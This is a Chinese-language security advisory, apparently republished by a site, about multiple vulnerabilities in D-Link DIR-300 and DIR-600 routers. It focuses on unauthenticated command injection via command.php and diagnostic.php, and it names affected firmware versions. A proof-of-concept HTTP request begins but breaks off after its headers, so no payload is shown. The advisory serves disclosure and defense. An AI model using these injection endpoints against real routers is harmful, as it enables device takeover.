受影响系统:
D-Link DIR-300
D-Link DIR-600
描述:
BUGTRAQ ID: 59405
D-Link DIR-600和DIR-300均是无线路由器产品。
D-Link DIR-600和DIR-300在实现上存在多个安全漏洞,包括多个命令注入漏洞、跨站请求伪造漏洞、跨站脚本漏洞、密码加密漏洞、信息泄露漏洞、HTTP标头注入漏洞、安全措施绕过漏洞,恶意用户可利用这些漏洞泄露某些系统信息、解密已存储密码、在受影响设备上下文中执行任意命令、窃取cookie身份验证凭证、在用户会话上下文中执行未授权操作、重定向用户到任意站点、HTTP请求走私并控制受影响设备。
1、设备没有限制对router_info.xml的访问,通过错误消息可泄露完整路径;
2、设备没有限制对DevInfo.txt和version.txt的访问,可造成某些设备信息泄露;
3、设备没有限制对command.php的访问,通过特制的HTTP请求,可导致执行任意shell命令。影响范围:D-Link DIR-300 v2.12和2.13、D-Link DIR-600 v2.12b02, 2.13b01, 2.14b01.
4、设备没有限制对diagnostic.php的访问,通过特制的HTTP请求,可导致执行某些OS命令。影响范围:D-Link DIR-300 v2.13b01、D-Link DIR-600 v2.15b01之前版本
<*来源:Michael Messner (michae.messner@integralis.com)
链接:http://www.securelist.com/en/advisories/52080
http://www.s3cur1ty.de/m1adv2013-003
http://www.s3cur1ty.de/m1adv2013-017
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Michael Messner (michae.messner@integralis.com)提供了如下测试方法:
* OS命令注入:
POST /diagnostic.php HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
版权与免责声明:
凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;